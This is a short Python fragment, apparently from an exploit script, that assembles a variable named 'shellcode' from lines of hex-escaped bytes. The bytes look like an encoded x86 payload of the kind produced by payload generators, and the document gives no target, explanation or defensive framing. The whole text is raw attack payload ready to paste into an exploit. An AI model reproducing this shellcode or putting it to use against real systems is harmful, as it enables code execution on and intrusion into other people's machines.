shellcode =  b""
shellcode += b"\xdb\xce\xb8\xfe\x94\x99\xeb\xd9\x74\x24\xf4"
shellcode += b"\x5b\x29\xc9\xb1\x31\x31\x43\x18\x03\x43\x18"
shellcode += b"\x83\xeb\x02\x76\x6c\x17\x12\xf5\x8f\xe8\xe2"
shellcode += b"\x9a\x06\x0d\xd3\x9a\x7d\x45\x43\x2b\xf5\x0b"
shellcode += b"\x6f\xc0\x5b\xb8\xe4\xa4\x73\xcf\x4d\x02\xa2"
shellcode += b"\xfe\x4e\x3f\x96\x61\xcc\x42\xcb\x41\xed\x8c"
shellcode += b"\x1e\x83\x2a\xf0\xd3\xd1\xe3\x7e\x41\xc6\x80"
shellcode += b"\xcb\x5a\x6d\xda\xda\xda\x92\xaa\xdd\xcb\x04"
shellcode += b"\xa1\x87\xcb\xa7\x66\xbc\x45\xb0\x6b\xf9\x1c"
shellcode += b"\x4b\x5f\x75\x9f\x9d\xae\x76\x0c\xe0\x1f\x85"
shellcode += b"\x4c\x24\xa7\x76\x3b\x5c\xd4\x0b\x3c\x9b\xa7"
shellcode += b"\xd7\xc9\x38\x0f\x93\x6a\xe5\xae\x70\xec\x6e"
shellcode += b"\xbc\x3d\x7a\x28\xa0\xc0\xaf\x42\xdc\x49\x4e"
shellcode += b"\x85\x55\x09\x75\x01\x3e\xc9\x14\x10\x9a\xbc"
shellcode += b"\x29\x42\x45\x60\x8c\x08\x6b\x75\xbd\x52\xe1"
shellcode += b"\x88\x33\xe9\x47\x8a\x4b\xf2\xf7\xe3\x7a\x79"
shellcode += b"\x98\x74\x83\xa8\xdd\x8b\xc9\xf1\x77\x04\x94"
shellcode += b"\x63\xca\x49\x27\x5e\x08\x74\xa4\x6b\xf0\x83"
shellcode += b"\xb4\x19\xf5\xc8\x72\xf1\x87\x41\x17\xf5\x34"
shellcode += b"\x61\x32\x96\xdb\xf1\xde\x77\x7e\x72\x44\x88"
